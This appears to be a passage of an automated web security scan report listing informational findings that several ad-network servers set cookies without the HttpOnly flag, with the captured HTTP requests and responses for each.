Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:39:41 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjNt9jGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:39:41 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:39:41 GMT
Set-Cookie: vsd=0@1@4dcbc6fd@cdn.turn.com; path=/; domain=.adbrite.com; expires=Sat, 14-May-2011 11:39:41 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.55. http://ads.cpxadroit.com/adserver/10-794ZA8LJ0UA05.cpxad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cpxadroit.com
Path:   /adserver/10-794ZA8LJ0UA05.cpxad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/10-794ZA8LJ0UA05.cpxad HTTP/1.1
Host: ads.cpxadroit.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPX_3P=dlxdt=4/23/2011 12:50:05 AM; CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIGY8J2TS4TB; CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00; CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ALI20110512=2894-4-1776-120,2-5-841-63,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
Set-Cookie: PLI20110512=3392-4-1-8,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
Set-Cookie: SECPOP20110512=3392-3-1-72,8,2,1; expires=Fri, 13-May-2011 12:02:12 GMT; path=/
Set-Cookie: CPX=IG=1&VID=fb257e86-0fa0-41bd-822b-b34cfbac2a55&LS=4TIMV11HXVYE6; expires=Sat, 12-May-2012 12:02:12 GMT; path=/
Set-Cookie: CPXSEC=5JK3HOCEHD5=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&5JK3HWQEL6A=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; expires=Sat, 11-Jun-2011 12:02:12 GMT; path=/
Set-Cookie: CPX_IMP=6SQNB131HR1D7|5JK1IIZ8K16=794ZA8LJ0UA05,794ZAAKK4W7C8,4/23/2011 12:50:05 AM -04:00&66SRK4O488E00|5JK1J1PH6N1=794ZA8LJ0UA05,794ZAAKK4W7C8,5/12/2011 8:02:12 AM -04:00; expires=Sat, 11-Jun-2011 12:02:12 GMT; path=/
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 12 May 2011 12:02:11 GMT
Content-Length: 2249

var popurlfull=true;var popped=false;var isChrome = navigator.userAgent.toLowerCase().indexOf("chrome") > -1;var win;function pop(){if (popped) return; popped=true;win = window.open ("http://www.freep
...[SNIP]...

14.56. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1264419-593881-1215295-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1049851-1096152-1063912-1166710-1063916-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1006093-86237-1006089-1009578-1049785-1191521-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-1009462-397180-1044578-1010301-1041270-1020427-1093092-1093093-1049769-1049770-596293-576685-596292-1049772-1044587-596291 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__uYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gHx8="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:11 GMT

GIF89a.............!.......,...........D..;

14.57. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-703456-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1215295-1264419-593881-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1096152-1049851-1063912-1166710-1063916-588118-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1006093-617983-86237-1006089-1009578-1049785-1191521-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-672502-1009462-397180-1044578-1010301-1041270-1020427-1093092-1093093-1049769-1049770-596293-576685-596292-1049772-596291-1044587 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://media.ft.com/h/subs.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_av67=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_av67=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dq3p="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:03:55 GMT

GIF89a.............!.......,...........D..;

14.58. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J07717 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vmwK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vmwK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SoYd="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMVIymnMBYY1A2AYfdOlWvHvyjDeADmIHk3dlgbIhYgIZ72zFMZaoF589KlOXV8nxyxSf+tWScP9C9MnlIZdtPUwRh52AmA/Dj5098B5F4mw5ctew1LgAgfQOSUZbFuEVgBEZAGqnPxKY2SirLhRealH7VcoiO5XKwezEdBK4wkHMpBk1QcMayu/6XvrrstGNUyrJN+i+UtvWqj00nb0tsM0sssoipTwkymZp1YapBRpOgkyz6l8+qojR5H+1oCXO4bwpm/sISJmynzw6MIcmEXgWKZsd8PWv+WZHaKf6Zv4qbSRy4lIaOFGqDXlJ6wNnUZK1FMJFfCXkJbECP9h6KyoWH+y7O1R1rshU7WJx2j5aoKaSvDGjRyoYni/LkjV2xTlZhFrPOafWwykfKaq0r1WhSrC11W6YXhhYAsopkzm+IiU6uExGkrdE6weU4DvETwTeyfIb/620xg+XRJdCrykprAW//7ArNhmYBQXab0WaTKOH38U7jXpIYcdssR7iAxOpRNxiJ+ZTV+FFhkfyqzU2GnEgeJajRZ7R7Cv4AojLmYZ1OUfUWgd7VLLDAB2qeEPsUyZl7qR5CE1RzN0N7NBGvpuz8ioJm1f6g6Z4Ck03y2d6rrmR2y7IUxG8sL8Q8KnLHLhRdewocmGtepFri//wmzDvZQbzuXg3zEfpfDSNI5SEXv54JZ82IKGt8OAS0dzLycfYFFTorrWI2DarYtxkCODHp4eJ+//F5kHSe8lFCcKj15jWIXPFEk2qb1oF4CI/5ii3rsSs04yrXgrjWsqOCWv3qMGN3m8fIDll0uvz0pd7EhDNkWnz6SqtTBhBJKj8EBCqf0OzMhmlCj6Eal5SB3CFgUSq4kAG7YxioFCsNWCqxWyueHhcIb4q+Vrj5BWfWx8XO/fh9LTvDoAXiTZKO4atBfk/2w6qdumxddKE6eBf3s76uy7EGmmVTi44VkBepMLvecc7/EhLWR33wZ5IUO3ee/yRFJHGPtLOnoDHNRVu2KCNBYwwFoiSTkMLRZWA7GoF0g7ih5VSUd+d6I3obyPLvbQ/IAMz41Skvd8MPJG6IuIcKIYoKBuU5uscV5bH1P8hhXaaLpoxVoK6VjeIg4ipaItbveIJEhqFKdGeGDgYl7d+srWB0ro9FWLTKOX5vrF4YDmU9TLK5uT5WHm3h9WdBzjdXrUBcPhwphVb4hblAcNeK8RzTWM7TamF13B/5mCEzm9iTP+ybJO3g6SP4zc+3wJvDQesZNKNHaoyLl27uGbsEbm0ngVT9j6S3LkyvKGQbfSco5brfhcFhccxGhRgzwi6y3w34eaUqdPs9rNEjOF+NK3dQBqFjfm5TCVJ6ScRSDYVwolf7qjDYPQ2w53tnDNaLKsbFZTLc3tntGaGlARPYKdoO2bZ1UeyMAWxLRb+K8YQ05VpuOzKEHJKmWVnt9S6QgLmFgcY7Rpf6tcZC0mNJA3l6E02FagVoi33Sz74DdHN5Lxj7au1Swn9ddXK3mpiHgjfI2ecHDEIep2bE71AaS1zw3pQyZJTAcGINFDZMqVr9xPNOjuvHIWLOV3SfigOvTj4lYY8LITvjocn7C8PBzbPLLMD3uX6TTe9en45wPDe95MttMa+YdpDzSWRw6TXbUXHDyaijcoa3Z/RB2KibsTEIRaHSVBh7L38+SwueaJDlU"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:11 GMT
Content-Length: 2174

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.59. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1009698-703456-621393-665981-1268392-317325-1198035-1049794-1238051-481602-185980-770484-757774-74560-1086373-1196055-1086372-1215295-1264419-593881-1236954-1086371-1086370-1086369-926097-1236953-1196051-1236950-1236951-1147048-107089-1096152-1049851-1063912-1166710-1063916-588118-1063911-1063910-1215322-1009546-715901-1023315-715883-725071-109108-75921-1081817-1224040-1006093-617983-86237-1006089-1009578-1049785-1191521-1092989-1201817-1086731-641525-1049788-124865-1284585-1086733-1077940-1044410-1093100-613349-1010298-397181-672502-1009462-397180-1044578-1010301-1146866-1041270-1020427-1093092-1093093-1049769-1049770-596293-596292-576685-1049772-596291-1044587 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_KXHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_KXHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nlbG="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:37:47 GMT

GIF89a.............!.......,...........D..;

14.60. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hjCW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G9_S="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.61. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K05539 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_UVQe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_e91p="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:38 GMT
Content-Length: 2299

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.62. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J07717 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://media.ft.com/h/subs.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Q2bN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Q2bN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LKv8="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:03:39 GMT
Content-Length: 2242

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

14.63. http://ads1.revenue.net/j

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:54 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CAB92OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzoxOjA6MTMwNTI0NDkxNDoxsAEEMDE3MTQ6LSkEAAcxMzA1MjAxNzE0EQAA; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
